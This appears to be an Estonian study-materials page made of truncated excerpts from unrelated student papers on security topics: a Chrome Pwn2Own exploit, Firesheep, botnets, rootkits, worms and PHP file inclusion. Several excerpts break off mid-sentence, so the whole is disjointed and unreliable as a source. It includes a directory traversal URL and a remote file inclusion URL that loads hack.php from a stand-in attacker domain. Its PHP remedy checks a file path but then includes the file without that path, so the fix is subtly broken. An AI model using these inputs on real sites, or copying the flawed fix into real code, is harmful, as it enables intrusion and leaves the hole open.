See turvaauk lubab käivitada omavolilist koodi haavatavatel Google Chrome versioonidel. On vaja kasutaja omapoolset tegevust, et seda auku ära kasutada, ehk kasutaja peaks käima pahatahtlikul lehel või avama pahatahtliku faili. Spetsiifiline viga esineb TypedArray objektide käsitlemisel. Muutes TypedArray objekti saab ründaja kirjutada ja lugeda andmeid igal aadressil. Ründaja saab kasutada seda turvaauku, et käivitada koodi käivas oleva protsessi kontektsis. Turvaaugu murdis lahti George Hotz võistluses Pwn2Own, mida sponsoneerib Google ja mis on mõeldud selleks, et häkkerite kaasabil saaks Chromiumi projekti turvalisust tõsta. Häkkerid proovivad turvaauke läbida ning arendajad saavad selle abil neid parandada. Hotz kirjutas exploit-i, mis hõlmas neli erinevat turvaauku ja sai selle eest auhinnaks $150 000. Selle turvaaugu exploit-i näidati Pwn2Own võistlusel, aga avalikkusele ei ole seda näidatud
See annab võimalust vaadata mistahes kataloogi sisu. Ainult vaatamine on võimalik, mitte allalaadimine. Ründajale on vaja ,,Browse" privileeg, et kasutada seda augu. Aga seda võib olla piisavalt, et vaadata näiteks mis tarkvara on arvutis installitud, ja sellest juba alustada tõelise rünnaku. Et augu kasutada, on vaja panna veebiaadressiks näiteks: http://hostname/browse?path=%2f.. %2f.. %2f Lahendus Autor ei toimeta proekti enam, sellega kõik originaalversioonid omavad seda turvaaugu. Aga oktoobris 2005 proekti veebilehekülgel pandi WAWI lähtekood. Sellega igaüks võib modifitseerida vajalikke funktsioone ja kasutada pluginit ohutult. Kasutatud materjalid (viimase kontrolli kuupäevaga) http://www.xakep.ru/post/35691/default.asp (16.01.2008) http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6512 (16.01.2008) http://www.flippet.org/wawi/ (16.01.2008) http://aluigi.altervista.org/adv/wawix-adv.txt (16.01.2008) http://xforce.iss.net/xforce/xfdb/30827 (16.01.2008)
Firesheep-iga kaasnevad turvariskid Märt Laanemäe Mis on Firesheep? Firesheepi näol on tegemist Eric Butleri (alias codebutler) veebibrauseri Firefox lisaga, mis võimaldab ülima kergusega võtta üle avalikus (krüpteerimata) WiFi võrgus teiste klientide Veebisessioone. Samuti püüdis ta mõista anda, et avalikus WiFis ei tohiks kunagi kondifentsiaalset informatsiooni vaadata Turvaaugu kirjeldus Tegemist ei ole konkreetse turvaaugu, vaid ohuga, mis tuleneb HTTP-protokolli disainist. Nimelt on HTTP olekuta (stateless) protokoll iga nõue (request) on serveri jaoks on sõltumatu tehing (transaction), mistõttu tuleb nõudega anda kaasa teatav hulk informatsiooni, mis nõude esitaja üheselt tulevaste nõuete jaoks identifitseeriks ja autendiks. HTTP nõuded ja vastused liiguvad (sealhulgas ka kasutaja autentimiseks mõeldud kasutajanimi ja
Võimalused Ohud · Võimalus suurendada järelvalvet · Lagi võib läbi lasta · Võimalused laiendada · Võib tekkida lühiseid turvameetmeid · Radiaatorite vedelike pritsimise oht · Võimalus laiendada võrguseadmete · Oht seadmete varingule kogust ja võrgukohtade arvu. · Võimaliku turvaaugu teke · Juurde soetada arvuteid kuna lihtsalt · Võidakse lihtsalt sisse murda paljudes klassides on rohkem inimesi kui arvuteid. arvtiklassi keskkond
BOTNET Botnet ehk robotvõrgustik on küberkurjategijate poolt kontrollitav arvutikogum. Samal ajal kui arvutiomanikud mängivad, surfavad või teevad muid igapäevaseid toimetusi, pommitab mõnda veebiserverit tühiste päringutega, kuni see enam koormuse all vastu ei pea, nakatab uusi arvuteid ja saadab laiali spämmi. Arvuti kontrolli alla saamiseks rünnatakse arvutit mõne turvaaugu kaudu (eriti kui arvutis on vananenud ja paikamata tarkvara) või pahavara abil, mis satub teie arvutisse näiteks kiirsuhtlusprogrammi, elektronposti kaudu või kuritahtlikke veebilehti külastades. Juhul kui operatsioonisüsteemil on sisse lülitatud mingisugused turvaseaded, vajab pahavara arvutisse installeerumiseks tavaliselt kasutaja otsest kaasabi, et enne "Yes" või "Ok" nupu vajutamist on alati kasulik lähemalt uurida, millega nõus ollakse.
Kräkkerid on need, keda huvitab isiklik kasu: kuulsus, tulu ja isegi kättemaks. Nad muudavad, kustutavad ja varastavad olulist infot ning teevad sageli teiste inimeste elu sellega põrguks. Tavaliselt on just kräkkerid need, kes teevad igasuguseid arvutiviiruseid (Cryptolocker, Torjan, Worm jne.). Häkkerid aga see-eest häkivad süsteeme selleks, et olla nende turvalisuses kindel ning teevad seda samade meetoditega, mida kräkker. Kui häkker leiab mõnes serveris turvaaugu, siis annab ta sellest teada serveri omanikule. Häkkeritest on tegelikult ka kasu, sest kui serveri haldaja saab sellest teada, siis ta üritab kõigest väest muuta seda süsteemi turvalisemaks. Kräkkerid on jah inimesed, kelle eest on ennast peaaegu võimatu kaitsta. See on ainult juhul kui kräkker häkib ennast sinu arvutisse otse sisse, kuid tavaliselt tehakse seda läbi mingite installi programmide või netilehekülgede. See toimib niimoodi, et kräkker kirjutab
on häkkimise vahend, mis võimaldab arvutisüsteemi luua turvamata sissepääsu, mis tagab teatud isikul, näiteks kräkkeril, salajase kaugjuurdepääsu arvutisse igal ajal, andes talle täieliku kontrolli kogu arvutisüsteemi üle. Tagauks püüab jääda alati võimalikult varjatuks, püüdes jääda avastamata ka traditsiooniliste tõrjevahendite eest Nõrkus, turvadefekt Exploit - turvaaugu ärakasutamine(programm) Rootkit - Rootkit (Arvutikaitse.ee peatoimetaja Aare Kirna eestindatud vaste Käomuna) on peidetud pahavara, ehk siis nähtamatu protsess või koodijupp (viirus, trooja, klahvivajutuste salvestaja ehk klahvinuhk, nuhkvara), mis suudab mööda hiilidanuhkvara- või viirusetõrjetetest, salvestub kettale ja hakkab õelvara loojale edastama arvutis leiduvat tundlikku informatsiooni – salasõnadest kuni pangakoodideni välja.
· Kasutavad ära meiliprogramme ja veebibrausereid (nii turvaauke kui kasutajate rumalust) Usside levimine · Suudavad levida väga kiiresti Iseseisvalt teenuse aukude kaudu levides mõne päeva kuni mõne tunniga kogu Internet, teoreetiliselt veerand tunniga Meili teel levivad aeglasemalt (vajalik kasutaja sekkumine igal sammul) Trooja hobused · Ründajal tuleb trooja hobune kõigepealt rünnatavasse masinasse sokutada (pipetid!) - kasutaja meelitamine mingi programmiga, turvaaugu ärakasutamine, kasutaja ära petmine; trooja hobune ise ei levi, avab ainult tagaukse või tegutseb iseseisvalt. Tänapäeval on keeruline, kuna arvutid on NATis või tulemüüri taga. Tänapäeval on lahenduseks see, et rünnatav arvuti pannakse ühenduma kuskile välja. · Levinud on ründajale juhtimiskanalit pakkuvad troojalased (varem eriti IRC võrgu kaudu, tänapäeval oma kanalid) - IRC = Internet Relay Chat = jututoad; botide jaoks oma varjatud
include_once($_GET['X'].'.php'); http://www.example.com/index.php?X=product_details - laaditakse faili product_details.php http://www.example.com/index.php?X=products_list - laaditakse faili products_list.php http://www.example.com/index.php?X=http://www.bad.com/hack - laaditakse faili hack.php domeenist bad.com Viimase punkti käitumine ei ole soovituslik ning on tõsine turvaauk ja kes teab mis hack.php sees võib olla ja mis tagajärjed selle käivitamisega kaasnevad. Turvaaugu vältimiseks on mitu võimalust. Üks on kontrollida, kas fail, mida tuleb laadida asub eelnevalt defineeritud kataloogis ja laadida seda ainult positiivse vastuse juhul. $includesPath = 'includes/products/'; ... ... ... if (file_exists($includesPath.$_GET['X'].'.php')) { include_once($_GET['X'].'.php'); } Teine variant on defineerida massiiv faili nimedega, mida võib $_GET parameetriga laadida. $includesList = array('product_details', 'products_list', 'product_images'); ... ..
annaabi.ee 
